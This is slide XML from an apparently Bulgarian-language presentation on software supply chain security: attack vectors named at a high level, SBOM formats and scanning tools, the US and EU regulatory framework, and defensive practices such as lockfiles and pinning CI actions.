            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ти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изпълни</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>техния</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>код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Векторите – целта на атакуващите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Typosquatting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пакет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клавиш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истинския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Account takeover — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>откраднати</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> maintainer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>креденшъли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Злонамерен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> maintainer.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Компрометиран</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> build — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>фабриката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превзета</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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сорсът</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>стои</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>чист</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>както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SolarWinds.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Dependency confusion.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компрометиран</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> CI/CD — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>отровен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Action </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>или</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> runner,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изтича</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> secrets.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AE032CAB-6449-771D-E27C-439F59A7CA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78247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FA194670-354F-0D71-EBFA-B4767FBAC2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7CDDB7F4-A92F-CE99-03F6-FD2D0F05C1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Един диалог от </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0" err="1"/>
              <a:t>дейлито</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t> с колегата в понеделник може да разкажа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br>
              <a:rPr lang="bg-BG" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Защо</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>самото</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>доверие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рискът</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?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Първо</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>транзитивните</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>зависимости</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>избираш</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пакета</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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получаваш</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1000, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>които</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>никога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си</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ч</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0" err="1"/>
              <a:t>увал</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t> виждал и прочие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Второ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>голяма</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>част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критичната</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>инфраструктура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поддържа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1-2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>доброволци</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>без</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>заплащане</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>тук</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>задължително</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>показвам</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> XKCD 2347 — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>цялата</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>модерна</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>инфраструктура</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>крепена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човек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Небраска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Трето</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>вендорският</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>софтуер</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>работи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високи</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>привилегии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широк</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>мрежов</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>достъп</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; SolarWinds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мониторинг</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>инструмент</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>той</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>вижда</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>всичко</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.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четвърто</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>автоматичните</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> update-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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>едновременно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>защита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вектор</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>същият</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>механизъм</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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те</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пачва</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>доставя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backdoor-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>а</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t>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– За това малко по-късно ще ви разкажа как е добре да се постъпва с Автоматичните Ъпдейти</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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45805140-FE30-9CDA-01C6-52749D28BD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897264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B775E8EC-DCE9-57B2-C844-9D9961EAC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FE090159-6B68-6BF8-1A98-3D6CAA0DEE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SBOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t> много от вас са чували предполагам</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — Software Bill of Materials, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>списъкът</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>със</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>съставки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софтуера</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>компоненти</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>версии</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>лицензи</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>хешове</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>зависимости</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.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Основните</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>формати</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>са</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SPDX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CycloneDX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. VEX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>го</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>допълва</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>казва</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>дали</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>дадена</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>уязвимост</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>реално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експлоатируема</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>във</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>вашия</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>продукт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Практическата</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>стойност</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>когато</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>излезе</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>нещо</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>като</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Log4Shell, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>отговорът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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>засегнати</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ли</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>сме</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?'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заявка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секунди</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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седмица</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>паника</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.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 err="1"/>
              <a:t>Инструменти</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syft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генериране</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>grype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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trivy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сканиране</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t> Като </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syft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grype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ги</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>видим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живо</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>след</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>малко</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p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endParaRPr lang="bg-BG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A800031A-EE95-4B45-03D4-CE5D343001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0831408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DEA54902-7C1C-20DC-5459-9F4B01F7B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8ED4EC09-C4AA-1C77-75F4-42DD1C5BE6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Да поговорим и за </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="bg-BG" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Регулаторната</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>рамка</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>идва</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. US Executive Order 14028 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>от</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2021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пръв</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>път</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>вкара</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SBOM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обществените</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>поръчки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По-важен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нас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EU Cyber Resilience Act — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>изисква</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SBOM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управление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уязвимости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продукти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цифрови</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>елементи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пазара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ЕС.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Задълженията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докладване</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>започват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септември</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2026, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пълното</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>прилагане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декември</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2027.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Но</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>бъдете</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>честни</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>със</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>залата</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: SBOM НЯМАШЕ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спре</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>нито</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SolarWinds, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>нито</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xz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Той</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>помага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реакция</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,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превенция</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Тази</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>разлика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важна</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> —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продавайте</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SBOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>като</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>магически</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>щит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3C745174-9920-761D-66C9-C75FBA3B6A0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650248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566DF2A6-D4CF-3D8B-9FF5-60B928C4A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825533F7-9F3B-EF57-E587-57F590B9CC1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защитаваме</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>като</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> КОНСУМАТОР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зависимости</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Lockfiles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хешове</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>и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ci </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>вместо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dirty="0" err="1"/>
              <a:t>в</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> CI. Pin-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>вайте</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> GitHub Actions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>към</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
